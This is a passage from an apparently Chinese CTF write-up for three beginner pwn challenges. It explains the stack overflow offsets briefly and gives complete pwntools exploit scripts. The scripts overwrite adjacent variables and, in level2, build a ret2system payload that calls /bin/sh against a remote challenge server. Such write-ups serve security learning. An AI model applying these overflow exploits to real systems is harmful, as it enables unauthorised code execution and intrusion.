v5
=1926
即可返回flag。而第二次输入传值给的V4
距离V5
只有8,也就是说只要我们的输入超出8位后,便可以覆盖到V5
上面了
EXP
from pwn import *
sh = process("./when_did_you_born")
sh = remote("111.198.29.45",40573)
payload = "a"*8+p64(1926)
sh.recvuntil("Birth?\n")
sh.sendline("hhh")
sh.recvuntil("Name?\n")
sh.sendline(payload)
sh.interactive()
dword_60106c
=1853186401
即可调用system函数,而dword_60106c
距离read读取用户输入的地址只差4,也就是超出4位后,覆盖一下即可
EXP
from pwn import *
#sh = process("./hello_pwn")
sh = remote("111.198.29.45",45344)
payload = "a"*4+p64(1853186401)
sh.recvuntil("bof\n")
sh.sendline(payload)
sh.interactive()
system
函数,那么只要再找到/bin/sh
字符串即可返回shell
EXP
from pwn import *
sh = process("./level2")
sh = remote("111.198.29.45",50653)
elf = ELF("./level2")
main = 0x08048480
system = elf.sym["system"]
binsh = 0x0804a024
payload = "a"*140
payload += p32(system)+p32(main)+p32(binsh)
sh.recvuntil("nput:\n")
sh.sendline(payload)
sh.interactive()